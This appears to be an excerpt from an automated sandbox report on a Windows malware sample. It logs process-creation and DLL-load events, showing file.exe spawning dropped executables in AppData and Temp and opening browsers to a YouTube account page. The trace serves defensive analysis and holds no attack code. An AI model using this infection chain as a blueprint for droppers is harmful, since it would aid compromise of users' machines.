Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3020 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2188 -prefMapHandle 2148 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3d9a631-0c4f-4452-8e9e-490c2e469294} 6968 "\\.\pipe\gecko-crash-server-pipe.6968" 16dcc56d910 socket
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6772 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6916 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe "C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4548 -parentBuildID 20230927232528 -prefsHandle 4540 -prefMapHandle 4536 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3a73529-841c-43f4-a1e0-97d887784ff3} 6968 "\\.\pipe\gecko-crash-server-pipe.6968" 16ddf13f710 rdd
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=7960 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=8128 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe"	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe"	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe "C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\1000003002\ee7a49fbf0.exe "C:\Users\user\1000003002\ee7a49fbf0.exe"
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2E3C.tmp\2E3D.tmp\2E3E.bat C:\Users\user\1000003002\ee7a49fbf0.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2252,i,8316535468258998242,13647816152217596395,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=2104,i,9402509172041055831,1536830809750770573,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2188 -prefMapHandle 2148 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3d9a631-0c4f-4452-8e9e-490c2e469294} 6968 "\\.\pipe\gecko-crash-server-pipe.6968" 16dcc56d910 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4548 -parentBuildID 20230927232528 -prefsHandle 4540 -prefMapHandle 4536 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3a73529-841c-43f4-a1e0-97d887784ff3} 6968 "\\.\pipe\gecko-crash-server-pipe.6968" 16ddf13f710 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3020 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6772 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6916 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=7960 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=8128 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe "C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: srvcli.dll	Jump to behavior
